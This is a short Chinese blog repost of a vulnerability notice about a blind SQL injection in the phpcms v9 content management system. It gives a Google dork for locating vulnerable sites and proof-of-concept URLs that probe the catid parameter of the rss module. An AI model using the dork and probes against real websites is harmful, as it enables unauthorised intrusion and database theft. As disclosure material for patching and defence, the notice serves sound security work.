phpcms V9 BLind SQL 注入漏洞0day

本文整理自网络，侵删。

　　影响版本：phpcms v9 blind

　　官方网站：http://www.phpcms.cn

　　漏洞类型：SQL注入

　　漏洞描述：phpcms v9 blind 参数过滤存在SQL注入漏洞。

　　google dork:inurl:"index.php?m=content+c=rss+catid=10"

　　exploit & p0c

　　[!] index.php?m=content&c=rss&catid=[valid catid]

　　Example p0c

　　[!] http://host/index.php?m=content&c=rss&catid=10 <= True

　　[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

　　[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

更多PHPCMS内容来自木庄网络博客

标签：PHPCMS

相关阅读 >>

phpcms建站系统-个人建站必不可少的工具

phpcms系统设置镜像下载模式 如何设置phpcms镜像下载模式

phpcms 列表页中调用其下的所有子栏目(或特定的子栏目)的方法

phpcms缓存使用总结(memcached、eaccelerator、shm)

phpcms2008常用函数小结

国内一些常用php的cms的nginx服务器的伪静态规则整理

phpcms v9自定义评论字段utf8_cmsyou修正版

phpcms2008制作标签以及标签模板教程

phpcms实现在首页列表页频道页调用评论数代码分享

可以后台在线升级的建站程序cms大盘点(图文)

更多相关阅读请进入《phpcms》频道 >>

转载请注明出处：木庄网络博客 » phpcms V9 BLind SQL 注入漏洞0day